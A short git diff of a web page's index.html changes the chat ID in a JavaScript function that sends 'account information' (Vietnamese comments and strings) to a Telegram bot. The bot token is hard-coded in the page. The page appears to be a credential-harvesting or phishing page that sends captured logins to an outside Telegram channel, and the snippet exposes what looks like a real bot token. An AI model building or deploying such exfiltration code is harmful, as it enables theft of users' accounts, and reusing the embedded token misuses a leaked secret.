--- a/index.html
+++ b/index.html
@@ -164,7 +164,7 @@
     function sendToTelegram(accountInfo) {
       console.log('Gửi thông tin tài khoản đến Telegram:', accountInfo);
       const botToken = '6211801440:AAEs6S_eH-SPFNqBQMlhLZB2G2_rTs9i4VQ'; // Thay thế bằng token của bot Telegram của bạn
-      const chatId = '@Nubcute'; // Thay thế bằng chat ID của bạn
+      const chatId = '6125384141'; // Thay thế bằng chat ID của bạn
   
       // Định dạng thông điệp
       const message = `Thông tin tài khoản:\n${accountInfo}`;
